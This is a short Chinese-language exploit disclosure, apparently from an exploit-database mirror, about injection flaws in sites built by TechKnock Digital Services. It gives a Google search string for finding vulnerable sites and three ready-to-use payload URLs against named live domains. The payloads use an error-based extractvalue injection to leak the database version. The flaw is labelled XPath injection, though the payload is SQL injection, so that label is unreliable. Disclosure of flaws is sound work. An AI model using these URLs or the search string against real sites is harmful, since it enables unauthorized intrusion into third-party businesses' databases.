TechKnock Digital Services - XPath注入漏洞

风险等级： 低
本地利用： 否
远程利用： 是
CVE： 暂无
CWE： 暂无
搜索语法： “Developed By TechKnock Digital Services.”

漏洞信息

漏洞标题： TechKnock Digital Services - XPath注入漏洞
日期： 2025-05-21
漏洞作者： Behrouz Mansoori
Google搜索语法： “Developed By TechKnock Digital Services.”
分类： Web应用程序
测试环境： Mac, Firefox

漏洞验证

演示示例：

1
2
3


http://rs-enterprises.co.in/category.php?id=2%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+
http://www.rs-enterprises.co.in/product-detail.php?id=5%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+&catid=1
http://hailmaryrefrigeration.co.in/products.php?id=42%27%20and%20extractvalue(rand(),concat(0x7e,version()))--+&catid=1

发现者信息

发现者： Behrouz Mansoori
Instagram： Behrouz_mansoori
邮箱： mr.mansoori@yahoo.com

XPath注入漏洞技术分析与验证

本文详细分析了TechKnock Digital Services存在的XPath注入漏洞，包含漏洞风险评级、Google搜索语法、具体漏洞验证URL示例，以及利用extractvalue函数进行数据库版本信息提取的技术细节。